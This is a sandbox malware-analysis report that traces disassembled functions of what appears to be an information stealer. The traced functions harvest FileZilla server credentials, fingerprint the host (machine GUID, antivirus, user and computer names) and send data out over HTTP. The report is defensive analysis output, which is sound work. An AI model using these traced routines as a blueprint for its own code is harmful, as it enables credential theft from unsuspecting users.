                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040C989
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00426B36,00426B33,00426B32,00426B2F), ref: 0040C9DF
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 433178851-2340581703
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                                                  • Instruction ID: d11abaa09dd60fea0b83d1247216ad2e93eb725a93b7f2adba71b57396a44103
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE19275D00218AACB14EBE0DD56BEEBB79AF19304F50046EF501B31D2DF786A08CB69
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00405CE0 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 681networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 573 405ce0-405dd2 call 40fe60 call 404430 call 40fe20 * 5 call 4100c0 InternetOpenA StrCmpCA 590 405dd4 573->590 591 405ddb-405ddd 573->591 590->591 592 405de3-405f61 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 591->592 593 4064bf-4064e0 InternetCloseHandle call 4100c0 call 406f50 591->593 677 405f67-405f9f HttpOpenRequestA 592->677 678 4064bc 592->678 603 4064e2-40650f call 40feb0 call 40ffe0 call 40ff00 call 40fea0 593->603 604 406514-40659c call 411380 * 2 call 40fea0 * 8 593->604 603->604 679 4064b5-4064b6 InternetCloseHandle 677->679 680 405fa5-405fa9 677->680 678->593 679->678 681 405fc1-406450 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 402450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 lstrlen GetProcessHeap HeapAlloc call 4100c0 lstrlen call 4100c0 memcpy call 4100c0 lstrlen call 4100c0 * 2 lstrlen memcpy call 4100c0 lstrlen call 4100c0 HttpSendRequestA InternetReadFile 680->681 682 405fab-405fbb InternetSetOptionA 680->682 843 406452-406457 681->843 844 4064a8-4064b2 InternetCloseHandle 681->844 682->681 843->844 845 406459-4064a6 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 843->845 844->679 845->843 845->844
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,004201C1,?,00000000,004201C1,",00000000,004201C1,mode,00000000,004201C1,0156F198,00000000,004201C1,004269D8), ref: 00406392
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063A3
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063AE
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063B5
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063C6
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004063D7
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063E8
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406401
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040640A
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040641D
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406431
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406448
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040649E
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004064A9
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064B6
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004064C0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                                                                  • String ID: "$"$"$*$------$------$------$------$build_id$mode
                                                                                                                                                                                                                                                                                                  • API String ID: 530647464-3630346487
                                                                                                                                                                                                                                                                                                  • Opcode ID: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                                                  • Instruction ID: a08b747351f3a96535aba500675343c14e4fcb34faea4da8f047a2726442ef11
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10522D71801149EACB15E7E5C952BEEBBB89F19304F54407EE60173192DF782B4CCAB9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00415660 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1035stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 852 415660-41649f call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 402420 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4102a0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410c30 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410cd0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410d30 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 GetCurrentProcessId call 4119c0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410ee0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 411020 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4111e0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410260 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410220 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410bb0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410370 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4102a0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410300 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4104d0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410580 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410540 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410680 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4106f0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410aa0 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 410800 call 40ff50 call 40ff00 call 40fea0 * 2 call 410800 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 call 40fe20 call 401120 call 4153e0 call 40fea0 * 5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102A0: wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410C30: CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004273D0,00000000,?,00000000,00000000,00000000,00000000), ref: 0041599B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004119C0: CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410EE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410EE0: HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411020: VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004111E0: VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
